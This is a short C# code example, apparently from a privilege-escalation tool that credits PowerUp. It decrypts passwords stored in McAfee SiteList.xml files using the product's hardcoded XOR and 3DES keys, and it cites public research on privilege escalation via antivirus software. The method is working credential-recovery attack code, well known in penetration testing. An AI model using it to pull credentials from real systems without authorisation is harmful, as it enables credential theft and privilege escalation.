Ejemplo n.º 1
0
        private static string DecryptPassword(string base64password)
        {
            // Adapted from PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1#L4128-L4326

            // References:
            //  https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
            //  https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
            //  https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
            //  https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf

            // static McAfee key XOR key LOL
            byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };

            // xor the input b64 string with the static XOR key
            var passwordBytes = System.Convert.FromBase64String(base64password);

            for (var i = 0; i < passwordBytes.Length; i++)
            {
                passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
            }

            SHA1 crypto = new SHA1CryptoServiceProvider();

            var tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });

            // set the options we need
            var tDESalg = new TripleDESCryptoServiceProvider();

            tDESalg.Mode    = CipherMode.ECB;
            tDESalg.Padding = PaddingMode.None;
            tDESalg.Key     = tDESKey;

            // decrypt the unXor'ed block
            var decrypted = tDESalg.CreateDecryptor().TransformFinalBlock(passwordBytes, 0, passwordBytes.Length);
            var end       = Array.IndexOf(decrypted, (byte)0x00);

            // return the final password string
            var password = System.Text.Encoding.ASCII.GetString(decrypted, 0, end);

            return(password);
        }